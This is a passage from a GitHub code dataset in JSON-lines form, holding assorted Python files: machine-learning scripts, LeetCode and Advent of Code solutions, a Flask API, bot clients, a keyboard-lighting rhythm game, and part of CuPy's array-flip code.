sklearn.model_selection import GridSearchCV\n\nstart = time.process_time()\nres = 16\ntest_frac = 0.4\n\n\ndef resize_and_scale(img, size, scale):\n img = cv2.resize(img, size)\n return 1 - np.array(img, \"float32\") / scale\n\n\ndef process_data():\n path_to_data = \"./persian_LPR/\"\n folder_list = os.listdir(path_to_data)\n sz = (res, res)\n data = []\n data_label = []\n count = 0\n for folder in folder_list:\n path = os.path.join(path_to_data + folder + \"/\")\n img_list = os.listdir(path)\n for name in img_list:\n img = cv2.imread(path + name)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img = resize_and_scale(img, sz, 255)\n data.append(img.flatten())\n label = folder\n if folder == \"W\":\n label = \"ص\"\n if folder == \"S\":\n label = \"س\"\n data_label.append(label)\n count += 1\n\n data = np.array(data)\n data_label = np.array(data_label)\n\n return data, data_label, count\n\n\ndef unflatten(flattened):\n img = [[0 for x in range(res)] for y in range(res)]\n count = 0\n for i in range(res):\n for j in range(res):\n img[i][j] = 255 - flattened[count] * 255\n count += 1\n img = np.array(img)\n return img\n\n\ndef main():\n data, data_labels, data_size = process_data()\n\n x_train, x_test, x_train_labels, x_test_correct_labels = train_test_split(data, data_labels, test_size=test_frac,\n random_state=42, shuffle=True)\n\n print(\"Data size:\", data_size)\n test_size = int(test_frac * data_size)\n\n print(\"Data fetched successfully!\")\n clf = svm.SVC(C=1000, kernel='rbf', degree=3, gamma='scale', coef0=0.0, shrinking=False, probability=False,\n tol=0.001, cache_size=200, class_weight=None, verbose=False, max_iter=-1,\n decision_function_shape='ovr', random_state=None)\n\n clf.fit(x_train, x_train_labels)\n\n predictions = clf.predict(x_test)\n\n print(\"Training set score:\", clf.score(x_train, x_train_labels))\n count = 0\n for i in range(test_size):\n if predictions[i] == x_test_correct_labels[i]:\n count += 1\n else:\n imgplot = plt.imshow(unflatten(x_test[i]), cmap=\"Greys\")\n plt.title((\"Prediction:\", predictions[i], \" Correct Label: \", x_test_correct_labels[i]))\n plt.show()\n print(\"Test accuracy: \", count / test_size)\n print(\"Wrong predictions: \", test_size - count, \"out of\", test_size)\n print(\"Correct predictions: \", count, \"out of\", test_size)\n\n\nmain()\nprint(\"Time elapsed: \", time.process_time() - start, \"seconds\")\n\n'''cv = GridSearchCV(estimator=svm.SVC(),\n param_grid={'C': [10, 100, 1000], 'kernel': ('linear', 'rbf', 'sigmoid', 'poly',),\n 'decision_function_shape': ('ovr', 'ovo'), 'gamma': ('scale', 'auto'),\n 'shrinking': (False, True), 'tol': [0.001, 0.0001], 'probability': [False, True]})\n cv.fit(x_train, x_train_labels)\n clf = cv.best_estimator_\n print(\"Parameters of best estimator:\", cv.best_params_)'''\n","repo_name":"tarlaun/AI_Project","sub_path":"persian_LPR_SVM.py","file_name":"persian_LPR_SVM.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"15689237005","text":"N = int(input())\n#первое число, чтобы после считать только факториалы\nsumm = 1\n#чтобы посчитать факториал, т.к. там умножение\nfactor = 1\n#1, N+1 для того чтобы начиналась с единицы и выполнилось N раз\nfor i in range(1, N+1):\n #факториал\n factor *= i\n num = 1/factor\n #складываем дроби\n summ += num\nprint(summ)\n\n\n\n","repo_name":"TeleginSergey/HW2_python","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10077049658","text":"# encoding=utf8\n\n'''\n剑指 Offer II 069. 山峰数组的顶部\n符合下列属性的数组 arr 称为 山峰数组(山脉数组) :\n\narr.length >= 3\n存在 i(0 < i < arr.length - 1)使得:\narr[0] < arr[1] < ... arr[i-1] < arr[i]\narr[i] > arr[i+1] > ... > arr[arr.length - 1]\n给定由整数组成的山峰数组 arr ,返回任何满足 arr[0] < arr[1] < ... arr[i - 1] < arr[i] > arr[i + 1] > ... > arr[arr.length - 1] 的下标 i ,即山峰顶部。\n\n \n\n示例 1:\n\n输入:arr = [0,1,0]\n输出:1\n示例 2:\n\n输入:arr = [1,3,5,4,2]\n输出:2\n示例 3:\n\n输入:arr = [0,10,5,2]\n输出:1\n示例 4:\n\n输入:arr = [3,4,5,1]\n输出:2\n示例 5:\n\n输入:arr = [24,69,100,99,79,78,67,36,26,19]\n输出:2\n \n\n提示:\n\n3 <= arr.length <= 104\n0 <= arr[i] <= 106\n题目数据保证 arr 是一个山脉数组\n \n\n进阶:很容易想到时间复杂度 O(n) 的解决方案,你可以设计一个 O(log(n)) 的解决方案吗?\n\n \n\n注意:本题与主站 852 题相同:https://leetcode-cn.com/problems/peak-index-in-a-mountain-array/\n\n\n'''\n\n\nclass Solution(object):\n def peakIndexInMountainArray(self, arr):\n \"\"\"\n :type arr: List[int]\n :rtype: int\n \"\"\"\n n = len(arr)\n ans = -1\n\n for i in range(1, n - 1):\n if arr[i] > arr[i + 1]:\n ans = i\n break\n \n return ans\n\n","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/binary_search/leetcode-peakIndexInMountainArray.py","file_name":"leetcode-peakIndexInMountainArray.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33220628835","text":"from utils.ex_class import is_bodyweight_ex\nfrom utils.methods import dbopen\n\ndb_irina = 'Irina_Diary_db.sqlite3' ### ----->>> HIER DATENBANKPFAD EINGEBEN\ndb_eugen = 'Diary_db.sqlite3' ### ----->>> HIER DATENBANKPFAD EINGEBEN\ndb_test = 'Diary_dbcopy.sqlite3' ### ----->>> HIER DATENBANKPFAD EINGEBEN\n\ndef choose_db():\n possible_options = ['i','e','t']\n selected = ''\n while selected not in possible_options:\n selected = input('Welche Datenbank laden? Eugen(e), Irina(i) oder Test(t) ===> ')\n if selected == 'i':\n return db_irina\n elif selected == 'e':\n return db_eugen\n else:\n return db_test\n\n\n\n\n\ndef max_volume(exercise: int, path: str, lst_all: list): # sql quere in for-schleife\n bodyweight = 0\n if is_bodyweight_ex(exercise,lst_all) == 'yes':\n bodyweight = 80\n max_volume = 0\n best_workout = 0\n with dbopen(path) as c:\n for work_id in c.execute(''' SELECT DISTINCT workout_id\n FROM sets\n WHERE exercise_id = ?\n ''',(exercise,)):\n #print (work_id[0])\n sum = 0\n with dbopen(path) as cu:\n for set in cu.execute('''SELECT weight_kg,repetition\n FROM sets\n WHERE workout_id = ? AND exercise_id = ?\n ''',(work_id[0],exercise)):\n #print (set)\n sum += (set[0]+bodyweight)*set[1]\n #print (sum)\n if sum > max_volume:\n max_volume = sum\n best_workout = work_id[0]\n return best_workout\n \n\n","repo_name":"fatsamy/fatsamy","sub_path":"utils/sql_quere.py","file_name":"sql_quere.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37002898042","text":"import json\n\nimport requests\nfrom discord.ext import commands\n\n\nclass RandomSentences:\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name=\"zio_random\")\n async def zio_rand_sentence(self):\n r = requests.get('http://www.bestemmie.org/api/bestemmie/random')\n bestemmia = json.loads(r.text)[0]\n await self.bot.say(bestemmia.get(\"bestemmia_low\"))\n\n @commands.command(name=\"zio_default\")\n async def zio_default_sentence(self):\n await self.bot.say(\"mannaggialamadonna amici!!\")\n\n @commands.command(name=\"babbo_default\")\n async def babbo_default_sentence(self):\n await self.bot.say(\"Devo cagare!\")\n\n\ndef setup(bot):\n bot.add_cog(RandomSentences(bot))\n","repo_name":"peterpalace/pagliachatbot","sub_path":"bot/cogs/pagliacci_random_sentences.py","file_name":"pagliacci_random_sentences.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30929491361","text":"# -*- coding: utf-8 -*-\n\nfrom server import *\nfrom tornado.testing import AsyncHTTPTestCase\nimport tornado.web\nimport unittest\nimport websocket\nimport json\n\n\nclass CAAControlServerTest(AsyncHTTPTestCase):\n\n def get_app(self):\n \"\"\"@Override\"\"\"\n ClientContainer.instance().set_num_max(3)\n\n return tornado.web.Application([\n (r\"/robo/register\", RobotRegisterHandler),\n (r\"/robo/delete\", RobotDeleteHandler),\n (r\"/robo/([0-9]+)\", RobotSocketHandler),\n (r\"/user/register\", UserRegisterHandler),\n (r\"/user/delete\", UserDeleteHandler),\n (r\"/user/([0-9]+)/([0-9a-zA-Z]+)\", UserSocketHandler),\n (r\"/clients\", ClientsHandler)\n ])\n\n def tearDown(self):\n \"\"\"@Override\"\"\"\n ClientContainer._instance = ClientContainer()\n\n def test_register(self):\n response0 = json.loads(self.fetch(r\"/robo/register?index=1024\").body)\n self.assertTrue(response0['success'])\n self.assertEqual(response0['index'], '1024')\n\n response1 = json.loads(\n self.fetch(r\"/user/register?index=1024&passphrase=hogehoge\").body)\n self.assertTrue(response1['success'])\n\n def test_delete(self):\n response0 = json.loads(self.fetch(r\"/robo/register?index=1024\").body)\n self.assertTrue(response0['success'])\n self.assertEqual(response0['index'], '1024')\n\n response1 = json.loads(\n self.fetch(r\"/user/register?index=1024&passphrase=hogehoge\").body)\n self.assertTrue(response1['success'])\n\n response2 = json.loads(self.fetch(r\"/user/delete?index=1024\").body)\n self.assertTrue(response2['success'])\n\n response3 = json.loads(self.fetch(r\"/robo/delete?index=1024\").body)\n self.assertTrue(response3['success'])\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"caa-project/caa-central","sub_path":"control-server/server_test.py","file_name":"server_test.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71342050613","text":"import statsmodels.api as sm\nimport wooldridge\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nimport numpy as np\n\n# c1\ndf = wooldridge.dataWoo('WAGE1')\nmodel = sm.formula.ols(formula='wage ~ educ + exper + tenure', data=df).fit()\nX = df[['educ', 'exper', 'tenure']]\nres1 = df['wage'] - model.predict(X)\n\nmodel = sm.formula.ols(formula='np.log(wage) ~ educ + exper + tenure', data=df).fit()\nres2 = np.log(df['wage']) - model.predict(X)\n\nfig, axes = plt.subplots(2, 1)\nsb.distplot(res1, kde=False, ax=axes[0])\nsb.distplot(res2, kde=False, ax=axes[1])\n\n# c3\ndf = wooldridge.dataWoo('BWGHT').dropna()\nmodel = sm.formula.ols(formula='bwght ~ cigs + parity + faminc', data=df).fit()\nres = model.resid\nX = df[['cigs', 'parity', 'faminc', 'motheduc', 'fatheduc']]\nmodel = sm.OLS(res, X).fit()\nR2 = model.rsquared\nLM = len(df) * R2\n","repo_name":"dy0703/pycharm","sub_path":"Data Analysis/Econometric/Chap_5(Multiple regression analysis OLS asymptotics).py","file_name":"Chap_5(Multiple regression analysis OLS asymptotics).py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35302885200","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 16 10:07:24 2020\r\n\r\n@author: Razer Blade\r\n\"\"\"\r\n\r\ndef book2hist(textfile,n):\r\n import string\r\n import matplotlib.pyplot as plt\r\n import numpy as np\r\n\r\n count_words=dict()\r\n text= open(textfile)\r\n text = text.read().lower().translate(str.maketrans('', '', string.punctuation))\r\n text_list = text.split()\r\n text_set = set(text_list)\r\n for i in text_set:\r\n count_words[i] = text_list.count(i)\r\n\r\n sorted_dict = sorted(count_words.items(), key=lambda x: x[1], reverse=True)\r\n sorted2 = sorted_dict[:n]\r\n\r\n word = []\r\n value = []\r\n for i in sorted2 :\r\n a,b = i\r\n word.append(a)\r\n value.append(b)\r\n \r\n y= np.arange(len(word))\r\n plt.style.use('ggplot')\r\n plt.xticks(y,word)\r\n plt.title(\"Zipf's Law\")\r\n plt.xlabel(\"Words\")\r\n plt.ylabel(\"Count\")\r\n plt.bar(y,value,edgecolor=\"black\")\r\n ","repo_name":"Reda-Zerrari/Python-projects","sub_path":"book2hist.py","file_name":"book2hist.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33854078023","text":"from datetime import datetime\nfrom flask_restful import Resource, reqparse\n# from flask_jwt import jwt_required\n\nfrom models.section import SectionModel\n\n# Inheritance of Resource class\nclass Section(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument('chapter_id',\n type=int,\n required=True,\n help=\"Every section needs a chapter id.\"\n ) \n parser.add_argument('section_name',\n type=str,\n required=False,\n help=\"Every section needs a name.\"\n )\n parser.add_argument('section_description',\n type=str,\n required=False,\n help=\"Every section needs a description.\"\n )\n parser.add_argument('section_order',\n type=int,\n required=False,\n help=\"Every section needs an order.\"\n )\n \n def get(self, section_id):\n section = SectionModel.find_by_id(section_id)\n if section:\n return section.json()\n return {'message': 'Section not found'}, 404\n\n def post(self): \n data = Section.parser.parse_args()\n section = SectionModel(**data)\n\n try:\n section.save_to_db()\n except:\n return {\"message\": \"An error occurred inserting the item.\"}, 500\n\n return section.json(), 201\n\n def put(self, section_id):\n data = Section.parser.parse_args()\n\n section = SectionModel.find_by_id(section_id)\n\n if section is None:\n section = SectionModel(**data)\n else:\n section.chapter_id = data['chapter_id']\n section.section_name = data['section_name']\n section.section_description = data['section_description']\n section.section_order = data['section_order']\n section.section_update = datetime.now()\n\n section.save_to_db()\n\n return section.json() \n\n def delete(self, section_id):\n section = SectionModel.find_by_id(section_id)\n if section:\n section.delete_from_db()\n\n return {'message': 'Section deleted'} \n\nclass SectionList(Resource):\n def get(self): \n return {'sections': [section.json() for section in SectionModel.query.all()]}\n\n # Delete all sections will not delete child items\n def delete(self):\n SectionModel.delete_all() \n return {'message': 'All sections deleted'}","repo_name":"bkwok123/cohort4-Team-Ebook","sub_path":"python/resources/section.py","file_name":"section.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12898050147","text":"import logging\nfrom typing import Any, Dict, List, Union\n\nimport requests\n\nfrom bot.exceptions import BarreneroRequestException\n\nlogger = logging.getLogger(__name__)\n\n\nclass Barrenero:\n timeout = (3, 30)\n\n @staticmethod\n def _get(base_url: str, path: str, token: str) -> Union[List[Any], Dict[str, Any]]:\n try:\n url = base_url + path\n headers = {'Authorization': f'Token {token}'}\n\n with requests.get(url=url, headers=headers, timeout=Barrenero.timeout) as response:\n response.raise_for_status()\n result = response.json()\n except requests.RequestException as e:\n raise BarreneroRequestException('Cannot request Barrenero API') from e\n\n return result\n\n @staticmethod\n def _post(base_url: str, path: str, token: str, data: Dict[str, Any]) -> Dict[str, Any]:\n try:\n url = base_url + path\n headers = {'Authorization': f'Token {token}'}\n\n with requests.post(url=url, headers=headers, data=data, timeout=Barrenero.timeout) as response:\n response.raise_for_status()\n result = response.json()\n except requests.RequestException as e:\n raise BarreneroRequestException('Cannot request Barrenero API') from e\n\n return result\n\n @staticmethod\n def get_token_or_register(url: str, username: str, password: str, account: str=None, api_password: str=None) \\\n -> Dict[str, Any]:\n try:\n # Try to register user\n register_url = f'{url}/api/v1/auth/register/'\n data = {'username': username, 'password': password, 'account': account, 'api_password': api_password}\n with requests.post(url=register_url, data=data, timeout=Barrenero.timeout) as response_register:\n # If user is registered, try to get token using username and password\n if response_register.status_code == 409:\n login_url = f'{url}/api/v1/auth/user/'\n data = {'username': username, 'password': password}\n\n with requests.post(url=login_url, data=data, timeout=Barrenero.timeout) as response_user:\n response_user.raise_for_status()\n payload = response_user.json()\n else:\n response_register.raise_for_status()\n payload = response_register.json()\n except requests.RequestException as e:\n raise BarreneroRequestException('Cannot request Barrenero API') from e\n else:\n config = {\n 'token': payload['token'],\n 'superuser': payload['is_api_superuser'],\n }\n\n return config\n\n @staticmethod\n def miner(url: str, token: str) -> Dict[str, Any]:\n return Barrenero._get(base_url=url, path='/api/v1/status/', token=token)\n\n @staticmethod\n def storj(url: str, token: str) -> List[Dict[str, Any]]:\n return Barrenero._get(base_url=url, path='/api/v1/storj/', token=token)\n\n @staticmethod\n def wallet(url: str, token: str) -> Dict[str, Any]:\n return Barrenero._get(base_url=url, path='/api/v1/wallet/', token=token)\n\n @staticmethod\n def restart(url: str, token: str, service: str) -> Dict[str, Any]:\n return Barrenero._post(base_url=url, path='/api/v1/restart/', token=token, data={'name': service})\n\n @staticmethod\n def ether(url: str, token: str) -> Dict[str, Any]:\n return Barrenero._get(base_url=url, path='/api/v1/ether/', token=token)\n","repo_name":"perdy/barrenero-telegram","sub_path":"bot/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73098991091","text":"from __future__ import print_function\nimport logging\nimport grpc\nimport calculator_pb2\nimport calculator_pb2_grpc\n\n# Settings\nADDRESS_SERVER_MASTER = 'localhost:50051'\n\n\ndef run():\n stop = False\n while not stop:\n usr_in = input(\"Do a calculation? [y/n]\\n\")\n if usr_in.lower() == 'n' or usr_in.lower() == 'no':\n stop = True\n else:\n usr_in = input(\"Please enter term to calculate!\\n\")\n\n with grpc.insecure_channel(ADDRESS_SERVER_MASTER) as channel:\n stub = calculator_pb2_grpc.CalculatorStub(channel)\n response = stub.Calculate(calculator_pb2.CalculationRequest(expression=usr_in))\n\n if response.status == calculator_pb2.CalculationResponse.SUCCESS:\n print(\"The result is : \" + str(response.result) + '\\n')\n elif response.status == calculator_pb2.CalculationResponse.ZERO_DIVISION_ERROR:\n print(\"Error: Divide by zero in expression\")\n else:\n print(\"Invalid format of expression\")\n\n\nif __name__ == '__main__':\n logging.basicConfig()\n run()\n","repo_name":"HaidStefan/distributed_app","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14170027402","text":"from typing import Any, Dict, List\nfrom types import SimpleNamespace\nimport numpy\nfrom pynput import keyboard\n\nfrom common import *\nfrom keys import *\nimport sounds\n# import matplotlib.pyplot as plotlib\n\n\n# a key is represented by the corresponding led id.\nkey_to_pos = {k.led_id: k.center for k in specs}\nrender_keys = [\n CLK_GraveAccentAndTilde, CLK_1, CLK_2, CLK_3, CLK_4, CLK_5, CLK_6, CLK_7, CLK_8, CLK_9, CLK_0, CLK_MinusAndUnderscore,CLK_EqualsAndPlus, CLK_Backspace, CLK_NumLock, CLK_KeypadSlash, CLK_KeypadAsterisk,\n CLK_Tab, CLK_Q, CLK_W, CLK_E, CLK_R, CLK_T, CLK_Y, CLK_U, CLK_I, CLK_O, CLK_P, CLK_BracketLeft, CLK_BracketRight, CLK_Keypad7, CLK_Keypad8, CLK_Keypad9, CLK_Backslash,\n CLK_CapsLock, CLK_A, CLK_S, CLK_D, CLK_F, CLK_G, CLK_H, CLK_J, CLK_K, CLK_L, CLK_SemicolonAndColon, CLK_ApostropheAndDoubleQuote, CLK_Enter, CLK_Keypad4, CLK_Keypad5, CLK_Keypad6,\n CLK_LeftShift, CLK_Z, CLK_X, CLK_C, CLK_V, CLK_B, CLK_N, CLK_M, CLK_CommaAndLessThan, CLK_PeriodAndBiggerThan, CLK_SlashAndQuestionMark, CLK_RightShift, CLK_Keypad1, CLK_Keypad2, CLK_Keypad3\n]\nnon_render_keys = [k for k in onboard if k not in render_keys]\n\n\ndef binary_lit(num, keys):\n lit = []\n for k in keys:\n if num % 2 != 0:\n lit.append(k)\n num //= 2\n return lit\n\n\nclass Note:\n def __init__(self, key: int, t: float, color):\n self.j = 0\n self.key = key\n self.t = t\n self.color = numpy.array(color)\n\n\ndef judge(t: float, down_key: int, notes: List[Note]):\n # notes should be sorted according to t.\n judges = SimpleNamespace(perfect=0.06, good=0.11)\n for note in notes:\n if note.j:\n continue\n if note.key == down_key and abs(note.t - t) < 1:\n print(t - note.t)\n if abs(note.t - t) < judges.perfect:\n return note, 2\n elif abs(note.t - t) < judges.good:\n return note, 1\n return None, 0\n\n\ndef play_render(t: float, notes: List[Note]):\n # working_area = (0, 0, 300, 200)\n lookahead = 1.0\n note_box_size = 26.0\n note_velocity = 240.0\n \n colors = color_ids(onboard, 0, 0, 0)\n jcolor = burst_color if burst_color is not rainbow_color else perfect_result\n colors = blend(colors, color_ids(non_render_keys, *jcolor), alpha_blend(1.0))\n for note in notes:\n if abs(note.t - t) > lookahead:\n continue\n if note.j:\n continue\n note_pos_1 = key_to_pos[note.key] + note_velocity * (note.t - t)\n note_pos_2 = key_to_pos[note.key] - note_velocity * (note.t - t)\n for note_pos in [note_pos_1, note_pos_2]:\n for key in render_keys:\n if abs(key_to_pos[key].imag - note_pos.imag) > 6:\n continue\n dist = abs(note_pos - key_to_pos[key])\n if dist < note_box_size:\n a = 1 - dist / note_box_size\n rgb = note.color * a\n colors = blend(colors, color_ids([key], *rgb))\n colors = blend(colors, color_ids([note.key], *perfect_result))\n render(colors)\n\n\nburst_time = -1\nmiss_color = numpy.array([255, 64, 0])\ngood_color = numpy.array([32, 255, 64])\nrainbow_color = \"rainbow\"\nperfect_color = rainbow_color\nperfect_result = numpy.array([255, 255, 255])\nburst_color = perfect_color\n\n\nasync def oem_burst():\n try:\n oem = [spec for spec in specs if spec.led_id not in onboard]\n while burst_time > -100:\n t = time.perf_counter()\n dur = 0.6\n a = max(0, dur - (t - burst_time)) / dur\n if burst_color is not rainbow_color:\n render(color_specs(oem, *(burst_color * a)))\n else:\n phases = numpy.angle([k.center - (165 + 120j) for k in oem]) + t\n colors = []\n for k, phase in zip(oem, phases):\n colors += color_specs([k], *chsv(phase, 0.8, a))\n render(colors)\n await asyncio.sleep(0.008)\n except Exception:\n import traceback; traceback.print_exc()\n\n\nasync def results(chart: List[Note], duration: float):\n c = [2] * len(onboard)\n up = lambda i, v: c.__setitem__(i, min(c[i], v))\n for note in chart:\n up(min(len(c) - 1, int(note.t / duration * len(c))), note.j)\n c = [[miss_color, good_color, perfect_result, miss_color][v] for v in c]\n base = pure(255, 160, 224)\n sounds.applause.play()\n for i in range(len(c) + 1):\n async with Frame(0.008):\n colors = c[:i] + [[0, 0, 0]] * (len(c) - i)\n colors = [color_ids([k], *v)[0] for k, v in zip(onboard, colors)]\n render(blend(base, colors, alpha_blend(1.0)))\n\n\nasync def fade_pause_loop(delta):\n await asyncio.sleep(delta)\n sounds.pausing.fadeout(500)\n\n\nasync def play(music: str, chart: List[Note], keymap: Dict[Any, int]):\n global burst_color, burst_time\n\n def on_press(key):\n nonlocal seeya\n if seeya == False and key == keyboard.Key.esc:\n seeya = True\n return False\n try:\n if key.vk in keymap:\n press_queue.append((keymap[key.vk], time.perf_counter() - 0.02))\n except AttributeError:\n if key in keymap:\n press_queue.append((keymap[key], time.perf_counter() - 0.02))\n\n seeya = None\n press_queue = []\n sounds.mixer.music.load(music)\n await asyncio.sleep(0.5)\n fade_t = asyncio.create_task(fade_pause_loop(1.8))\n sounds.mixer.music.play()\n listener = keyboard.Listener(on_press=on_press)\n listener.start()\n burst_t = asyncio.create_task(oem_burst())\n reset_time = 0.0\n start_time = time.perf_counter()\n while sounds.mixer.music.get_busy():\n await asyncio.sleep(0)\n t = sounds.mixer.music.get_pos() / 1000.0\n if press_queue:\n for k, pt in press_queue:\n note, j = judge(t - time.perf_counter() + pt, k, chart)\n if j:\n note.j = j\n burst_time = time.perf_counter()\n if j == 2:\n if time.perf_counter() >= reset_time:\n burst_color = perfect_color\n if j == 1:\n reset_time = time.perf_counter() + 0.4\n burst_color = good_color\n press_queue.clear()\n for note in chart:\n if t > note.t + 0.09 and not note.j:\n note.j = -1\n burst_time = time.perf_counter()\n reset_time = time.perf_counter() + 0.5\n burst_color = miss_color\n play_render(t, chart)\n duration = time.perf_counter() - start_time\n for i in range(0, 255, 2):\n async with Frame(0.005):\n render(pure(255 - i, 255 - i, 255 - i))\n await asyncio.sleep(1.0)\n burst_time = -128\n await fade_t\n await burst_t\n seeya = False\n await results(chart, duration)\n while not seeya:\n await asyncio.sleep(0.02)\n sounds.seeya.play()\n await asyncio.sleep(3.5)\n","repo_name":"eliphatfs/kbdmania","sub_path":"play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"39950753202","text":"import sys\n\nin_file = sys.argv[1] if len(sys.argv) > 1 else \"input\"\nwith open(in_file, 'r') as f:\n data = f.read().splitlines()\n \nshape_score = {\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3,\n}\n\nwin_score = {\n \"A\": {\"X\": 3, \"Y\": 6, \"Z\": 0},\n \"B\": {\"X\": 0, \"Y\": 3, \"Z\": 6},\n \"C\": {\"X\": 6, \"Y\": 0, \"Z\": 3},\n} \n\nscore = 0\nfor l in data:\n x, y = l.split(\" \")\n score += shape_score[y]\n score += win_score[x][y]\nprint(score)\n\n\nwin_score = {\n \"X\": 0,\n \"Y\": 3,\n \"Z\": 6,\n}\n\nshape_score = {\n \"A\": {\"X\": 3, \"Y\": 1, \"Z\": 2},\n \"B\": {\"X\": 1, \"Y\": 2, \"Z\": 3},\n \"C\": {\"X\": 2, \"Y\": 3, \"Z\": 1},\n}\n\nscore = 0\nfor l in data:\n x, y = l.split(\" \")\n score += shape_score[x][y]\n score += win_score[y]\nprint(score)","repo_name":"theevann/advent-of-code","sub_path":"2022/day_2/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9117419055","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPAA and SAX features\n====================\n\nThis example presents a comparison between PAA, SAX and 1d-SAX features.\n\"\"\"\n\n# Author: Romain Tavenard\n# License: BSD 3 clause\n\nimport numpy\nimport matplotlib.pyplot as plt\n\nfrom tslearn.generators import random_walks\nfrom tslearn.preprocessing import TimeSeriesScalerMeanVariance\nfrom tslearn.piecewise import PiecewiseAggregateApproximation\nfrom tslearn.piecewise import SymbolicAggregateApproximation, OneD_SymbolicAggregateApproximation\n\nnumpy.random.seed(0)\n# Generate a random walk time series\nn_ts, sz, d = 1, 100, 1\ndataset = random_walks(n_ts=n_ts, sz=sz, d=d)\nscaler = TimeSeriesScalerMeanVariance(mu=0., std=1.) # Rescale time series\ndataset = scaler.fit_transform(dataset)\n\n# PAA transform (and inverse transform) of the data\nn_paa_segments = 10\npaa = PiecewiseAggregateApproximation(n_segments=n_paa_segments)\npaa_dataset_inv = paa.inverse_transform(paa.fit_transform(dataset))\n\n# SAX transform\nn_sax_symbols = 8\nsax = SymbolicAggregateApproximation(n_segments=n_paa_segments, alphabet_size_avg=n_sax_symbols)\nsax_dataset_inv = sax.inverse_transform(sax.fit_transform(dataset))\n\n# 1d-SAX transform\nn_sax_symbols_avg = 8\nn_sax_symbols_slope = 8\none_d_sax = OneD_SymbolicAggregateApproximation(n_segments=n_paa_segments, alphabet_size_avg=n_sax_symbols_avg,\n alphabet_size_slope=n_sax_symbols_slope)\none_d_sax_dataset_inv = one_d_sax.inverse_transform(one_d_sax.fit_transform(dataset))\n\nplt.figure()\nplt.subplot(2, 2, 1) # First, raw time series\nplt.plot(dataset[0].ravel(), \"b-\")\nplt.title(\"Raw time series\")\n\nplt.subplot(2, 2, 2) # Second, PAA\nplt.plot(dataset[0].ravel(), \"b-\", alpha=0.4)\nplt.plot(paa_dataset_inv[0].ravel(), \"b-\")\nplt.title(\"PAA\")\n\nplt.subplot(2, 2, 3) # Then SAX\nplt.plot(dataset[0].ravel(), \"b-\", alpha=0.4)\nplt.plot(sax_dataset_inv[0].ravel(), \"b-\")\nplt.title(\"SAX, %d symbols\" % n_sax_symbols)\n\nplt.subplot(2, 2, 4) # Finally, 1d-SAX\nplt.plot(dataset[0].ravel(), \"b-\", alpha=0.4)\nplt.plot(one_d_sax_dataset_inv[0].ravel(), \"b-\")\nplt.title(\"1d-SAX, %d symbols (%dx%d)\" % (n_sax_symbols_avg * n_sax_symbols_slope,\n n_sax_symbols_avg,\n n_sax_symbols_slope))\n\nplt.tight_layout()\nplt.show()\n","repo_name":"timothyyu/ml_monorepo","sub_path":"tslearn/tslearn/docs/examples/plot_sax.py","file_name":"plot_sax.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"21221789601","text":"import itertools\n\nimport numpy\n\nimport cupy\nfrom cupy import core\nfrom cupy.core._kernel import _get_axis\n\n\ndef flip(a, axis):\n \"\"\"Reverse the order of elements in an array along the given axis.\n\n Note that ``flip`` function has been introduced since NumPy v1.12.\n The contents of this document is the same as the original one.\n\n Args:\n a (~cupy.ndarray): Input array.\n axis (int): Axis in array, which entries are reversed.\n\n Returns:\n ~cupy.ndarray: Output array.\n\n .. seealso:: :func:`numpy.flip`\n\n \"\"\"\n a_ndim = a.ndim\n if a_ndim < 1:\n raise core._AxisError('Input must be >= 1-d')\n\n axis = int(axis)\n if not -a_ndim <= axis < a_ndim:\n raise core._AxisError(\n 'axis must be >= %d and < %d' % (-a_ndim, a_ndim))\n\n return _flip(a, axis)\n\n\ndef fliplr(a):\n \"\"\"Flip array in the left/right direction.\n\n Flip the entries in each row in the left/right direction. Columns\n are preserved, but appear in a different order than before.\n\n Args:\n a (~cupy.ndarray): Input array.\n\n Returns:\n ~cupy.ndarray: Output array.\n\n .. seealso:: :func:`numpy.fliplr`\n\n \"\"\"\n if a.ndim < 2:\n 